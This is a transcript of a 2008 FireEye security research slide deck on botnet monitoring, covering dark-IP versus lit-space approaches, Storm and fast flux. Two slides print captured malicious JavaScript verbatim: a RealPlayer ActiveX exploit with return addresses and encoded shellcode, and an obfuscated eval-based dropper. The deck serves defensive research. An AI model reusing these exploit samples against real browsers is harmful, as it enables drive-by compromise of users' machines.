Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.
-
Upload
felix-harrington -
Category
Documents
-
view
218 -
download
0
Transcript of Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.
![Page 1: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/1.jpg)
Lit Space Monitoring for Botnets
Stuart StanifordChief Scientist
1/21/2008
![Page 2: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/2.jpg)
2
Botnets = Targeted Infection + Remote Control Payload
Botnet - a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities
Remote control payload enables further malicious payload installs
Malicious payloads enable monetization via: Spam relay (leased to spammers) DDoS (extortion business model) ID Theft (consumer, business, or gov’t) Intellectual property theft
Phishing site hosting Click fraud Online financial services fraud E-commerce site fraud
![Page 3: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/3.jpg)
33
Botnets Are A Critical Threat
Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007
Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches.
Up to a quarter of computers on the net may be used by cyber criminals in so-called botnets - Vint Cerf
Botnets: A Global Pandemic
![Page 4: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/4.jpg)
4
Growing Wave of Concern
NuisanceLate 1990’s - 2002
Concern2003 - 2006
Low
Danger2007 - Beyond
Botnet Attack Evolution
High
Mag
nitu
de o
f T
hrea
t
Consumer
Service Provider
Enterprise
GovernmentCyber warfare
Mass-scale DDoSMass-scale SPAMClick fraudIdentity TheftPhishingPharming
Wide-scale revenue loss Corporate Espionage Total enterprise collapse Intellectual Property Theft Compliance RisksProductivity LossBrand DamageResource Inefficiency
Cyber-terrorism
DDoS SPAMSpyware platformSteal resources
![Page 5: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/5.jpg)
Traditional Botnet (first half 2000s)
Grow by active scanning
Command & Control via IRC
![Page 6: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/6.jpg)
6
Still a lot of that about
Portion of a botnet tracked by FireEye botwall network
![Page 7: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/7.jpg)
Monitoring Traditional Botnets
Dark IP Space/Network Telescope
Wait for bot to scan, andtry to capture
![Page 8: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/8.jpg)
Tradeoffs of Dark IP Monitoring
Advantages Fidelity - if something scans dark IP, is likely bad Cheap/easy - can cover a lot of IP space that wasn’t being
used Especially internally to enterprises
Disadvantages Some bots avoid the dark-IP space - scan selectively Persuading the bot to talk can be tricky
Need deep interaction honeypot to do it right Bots moving away from scanning as a technique Bot-owners can learn Dark Ips if feedback (eg to signatures)
![Page 9: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/9.jpg)
Directions in Botnet Technology
Technology evolution is rapid Well funded industry Smart technologists Disciplined execution of attacks and management of
resources/business Gives various trends that render current defensive
technologies obsolete1. Exploits via web/email (bypass firewall)2. Obfuscation and polymorphism (bypass AV/IPS)3. Distributed command-and-control, and high turnover of
assets, 1. renders trackdown and clean-up hard2. DNS tracking hard3. Web crawling behind the curve
![Page 10: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/10.jpg)
Exploits via web
if(user.indexOf("nt 5.")==-1)return;VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75%06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion=="6.0.14.544")ret=unescape("%63%11%08%60");else if(RealVersion=="6.0.14.550")ret=unescape("%63%11%04%60");else if(RealVersion=="6.0.14.552")ret=unescape("%79%31%01%60");else if(RealVersion=="6.0.14.543")ret=unescape("%79%31%09%60");else if(RealVersion=="6.0.14.536")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP="LLLL\\XXXXXLD";var cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvkKNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NXKjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnXzmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSNzT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWinInPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZodKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZoWsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInOoDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vvYiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQelhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJQspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsqmk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLNktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x8000)PayLoad+="copyleft";Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}RealExploit();
![Page 11: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/11.jpg)
More obfuscated example
<script language=JavaScript>function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23,3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)-48];sttp=saam<<s;w|=sttp;if(s){kek0=165^w;keke=kek0&255;kiki=keke;r=r+String.fromCharCode(kiki);s-=2;w=w>>8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb4Ta45pZ9ooUb2HfhDsXkcYfh3BCNgf8N@YJ45EXyi9ZPwkXown8bIs8BTy9k3hvo_k5o@9YV@GDMTzXo3SXBwn8MIGdk31CNISWN@kgV5pRMVId9xKa45pRmeKvy28iZcU5y2oa45acGeK0qIGdk31CN4SWN@Hwy2myMwcUkdQaP_cvP@u9mTlJpTaiZcu8o@kWB_HfhDsXkcCfh3BCNgjvo_S8NIWdP@n9mTGvowYXhIYXkcCibIvvEVf9hdsCVT8ix5kjPThJkIvdE3SCNwWaFIsWVxS6k3mg4TMdEIW5E@ljP_HwiwnXo@1XP_HYyDsUEwWXo@Cw25y0ZTvvo@HYyDsUEwkCVxL6oIQ9hcAxpTau2_S9BTEXi_Q9N@k5owmJkIvdE3SCNwWaFIsWVoQ9N@k5owyiZTvvo@Hwb2sUkInjEwW6kc1vo_k1kIn5o@1uBwSCV3l9hwyiZTkjPThwb2sUkInjEwW6oguXkIW8PdhyMokaEtWyF6HOFcHgFtkuMDaumTvvo@Hljd15JVmlb3n5aokaEidXo@udEw1DFeKjh3W8hdlak6yiZTHujIn8PdqdE@nWFcHZPwkXowndiwX5o@FvP_k5ow1OP@s6bd15o@dXo@udEw1e45HuM@OdP_fDPThljd15JVkiZTHxV5HumTfvE@QW2TOD9VO92UaumTHum0@5aV@9qisvP_fDk3z6ptyiZTHumT6XBwGjj3W8hdlakcfUkdQaP_Eao3l9hwSChdlaogSWB@Mdowl9VoQ9N@k5owyiZTHumT@vP_fDPxk8B_mbb_GUooQ9N@k5ow1ZB@GdP_hyMUCwMUaumTHu23l9BThbhIWWFdmuqUHwPTpumVSCNIhUbduCVgGXowYCBdyuFdbxF6HxBTkjPThujIn8PdqdE@nejd26GcCZ9VWyF6HxBTVWairW0txWhIn8PdQCkcAxpTmWFraumTHuFdXWm6VWairW0txWhIn8PdQCkcmOG6HxBTKDB@G5kdnab_F9k3W6GUyuFrHiZTHumTQUE@QWMDHYyDsUEwkCVxL6oIQ9hcPxpTmW25HumTHyo@QvEdyumTHu25HumTfvE@QW2TO9qeO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbe45HumTfvE@QW2TO9qeulVT9iZTHumTKDB@G5kdnab_F9k3W6GUyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TOayoO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbepTHumTHiZTHuMIS8h3HyM_PYq_Ci45HumTHYyDsUEwkCVxL6oIQ9hcAx45HumTHyo@QvEdyumTHumTaumTHZkIuXPTClhUBlVT9iZTHumTKDB@G5kdnab_F9k3W6GtyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TO6b2O92UaumTHuF2BWBwldP_5XhwCXo@mOqUaumTHu2IWXkIbepTHumTHiZTHum3QjkILUP_9umTaumTHuF2BWBwldP_5XhwCXo@mwqUHu25HumTHyo@QvEdyumTHiZTHgV5HuM@OdP_fDPThYyDsUEwkCVxL6oIQ9h6aumTy0ZTHuMIS8h3HuFt9iZTHumTC9h3SeEUaumTHZkIuXPTHw4UaumTHumwl8kIndEw1amdWXo3myMgQDP@lYPdsvqiW1E3zaP_WuG7AJmdn6oTyiZTHumTC9h3SeEUHu25HumTzXo3SXBwn045HumTHyo@QvEdyumTHumTHu25HuFrauFragV5abk_18P_k5owHlb3n5aokaEidXo@udEw1DFeK50_Q9N@kiRDauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gAlF6HOFcHgFtku2@QCh_WaPTClB0@1VTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gWlF6HOFcHgFtku2@QCh_WaPTClVtJ8q_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWF71uqKkuFTmuFgAwmTWXP_L9VwHyM_WxJ_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWm7YwmTSgpTFOG6Hyh3nXV@1W2TOayoO925Hwo3HrFeK50_Q9N@1wowzXPDRjP6Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2@QCh_WaPTClhUBlVTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaPTPrBTnJFUYwmTSgpTFOG6Hyh3nXV@1W2TO6b2O925m0x5pRM@f9hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25")</script>
Variables and encoding can be polymorphic - not much for signatures to go on
![Page 12: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/12.jpg)
Preliminary Expt on open network (Dec)
~ 5000 users ~ 3 hrs of intermittent data Parsed HTTP and entities ~ 200,000 HTTP containing flows Google safe browsing API alerted on ~700 of them Manually verified - only 11 checked out Daily rate is ~100 incidents/day
Don’t know how many were successful at this point Not sure how typical this period is so only order of magnitude
estimate Google safe browsing API is 99%+ false positives
Reasons not well understood yet Gearing up for another experimental run
Hopefully LEET 08 paper
![Page 13: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/13.jpg)
Distributed Command and Control - Storm
Grow by spam/malicious downloads - been running for 12 months now in plain sightNo scanning!
115,000 seen from a single .edu
eDonkey UDP messages in Peer-to-Peer command and control
![Page 14: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/14.jpg)
Dynamic Infrastructure - Fast Flux
DNS Servers
Small Number of Persistent Content Servers
Large Number of DynamicProxies
![Page 15: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/15.jpg)
FireEye, Inc. Confidential 15
Rendering Current Approaches Obsolete
GAPNeed security solution
that scales with exponential nature of threat
AntivirusBypass by not matching
AV signatures
IDS/IPSBypass by not matching signatures & using other
infection vectors
Network Behavior AnalysisBypass by low &
slow spread
Dark IP HoneypotsBypass by not targetingdark IP addresses and
honeypots
![Page 16: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/16.jpg)
FireEye, Inc. Confidential 16
Lit Space Monitoring
![Page 17: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/17.jpg)
FireEye, Inc. Confidential 17
Global Deployment
Local Analysis & Protection
Global Analysis & Intelligence Distribution
![Page 18: Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.](https://reader036.fdocuments.in/reader036/viewer/2022062322/56649ec65503460f94bd28a9/html5/thumbnails/18.jpg)
FireEye, Inc. Confidential
Thank you!
Q & A